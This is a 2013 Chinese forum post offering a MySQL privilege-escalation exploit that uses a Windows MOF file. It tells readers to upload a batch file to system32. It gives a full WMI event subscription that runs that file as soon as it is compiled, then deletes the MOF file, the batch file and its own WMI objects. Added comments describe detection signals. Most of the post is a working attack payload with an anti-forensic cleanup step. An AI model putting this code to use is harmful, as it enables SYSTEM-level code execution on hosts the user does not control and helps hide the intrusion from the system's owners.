标题:
Mysql 提权即时无错Mof exp
作者:
admin
时间:
2013-2-14 00:05
标题:
Mysql 提权即时无错Mof exp
这个sql提权MOF需要运行 system下的文件,不能定义路径。
需要将要运行的命令写入到bat上传到system32目录,然后执行。
这个sql提权MOF需要运行 system下的文件,不能定义路径。
需要将要运行的命令写入到bat上传到system32目录,然后执行。
// Permanent WMI event subscription, expressed as a MOF file.
// Everything below is compiled into root\cimv2. The subscription is built
// from the three object kinds a WMI-persistence audit enumerates:
// __EventFilter (what to watch), an event consumer (what to run) and
// __FilterToConsumerBinding (which filter drives which consumer).
// Compiling the file is itself the trigger: the final statement creates
// an instance of MyClass547, which $Filt watches for.
// Detection notes: both consumers delete their own filter/consumer objects
// after running, so the subscription may no longer be present when the host
// is examined; Sysmon events 19/20/21 (WmiEventFilter / WmiEventConsumer /
// WmiEventConsumerToFilter) and a cmd.exe child of the WMI script-consumer
// host (scrcons.exe) are the durable signals.
#pragma namespace("\\\\.\\root\\cimv2")

// Marker class. It carries no behavior; its only role is that creating an
// instance of it (see $MyClass at the bottom) raises the
// __InstanceCreationEvent that $Filt selects on.
class MyClass547
{
    [key] string Name;
};

// The consumer class is declared here, inside root\cimv2, together with its
// provider registration below, rather than relying on an existing class on
// the host. NOTE(review): presumably because the stock
// ActiveScriptEventConsumer lives in a different namespace -- confirm.
class ActiveScriptEventConsumer : __EventConsumer
{
    [key] string Name;
    [not_null] string ScriptingEngine;
    string ScriptFileName;
    [template] string ScriptText;
    uint32 KillTimeout;
};

// Provider registration for the consumer class above; the CLSID is the
// one given in the original post.
instance of __Win32Provider as $P
{
    Name = "ActiveScriptEventConsumer";
    CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
    PerUserInitialization = TRUE;
};

instance of __EventConsumerProviderRegistration
{
    Provider = $P;
    ConsumerClassNames = {"ActiveScriptEventConsumer"};
};

// Consumer 1 ("ASEC"): JScript that starts cmd.bat through WScript.Shell,
// then deletes the MyClass547 class, the "instfilt" filter and this
// consumer from root\cimv2. Every step is wrapped in try/catch, so failures
// are silent. "cmd.bat" is a relative path -- it resolves against the
// working directory of the process running the script (which the post's
// text says must be the system32 directory).
Instance of ActiveScriptEventConsumer as $cons
{
    Name = "ASEC";
    ScriptingEngine = "JScript";
    ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";
};

// Consumer 2 ("qndASEC"): cleanup. Uses Scripting.FileSystemObject to
// delete the MOF file itself (relative path wbem\mof\good\hBsBa.mof) and
// cmd.bat, then removes the "qndfilt" filter and this consumer. Again all
// errors are swallowed. The file deletions are the anti-forensic step;
// file-system auditing on the wbem\mof tree records them.
Instance of ActiveScriptEventConsumer as $cons2
{
    Name = "qndASEC";
    ScriptingEngine = "JScript";
    ScriptText = "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
};

// Filter 1: fires once, when an instance of the marker class is created.
instance of __EventFilter as $Filt
{
    Name = "instfilt";
    Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";
    QueryLanguage = "WQL";
};

// Filter 2: polls every second (WITHIN 1) for the deletion of a
// Win32_Process whose Name is cmd.bat, i.e. it fires when that process has
// exited, which sequences the cleanup consumer after the first one.
instance of __EventFilter as $Filt2
{
    Name = "qndfilt";
    Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";
    QueryLanguage = "WQL";
};

// Bindings: instfilt -> ASEC, qndfilt -> qndASEC.
instance of __FilterToConsumerBinding as $bind
{
    Consumer = $cons;
    Filter = $Filt;
};

instance of __FilterToConsumerBinding as $bind2
{
    Consumer = $cons2;
    Filter = $Filt2;
};

// Trigger: creating this instance raises the event $Filt selects, so the
// subscription fires as soon as the MOF has been compiled. No separate
// action on the host is needed after compilation.
instance of MyClass547 as $MyClass
{
    Name = "ClassConsumer";
};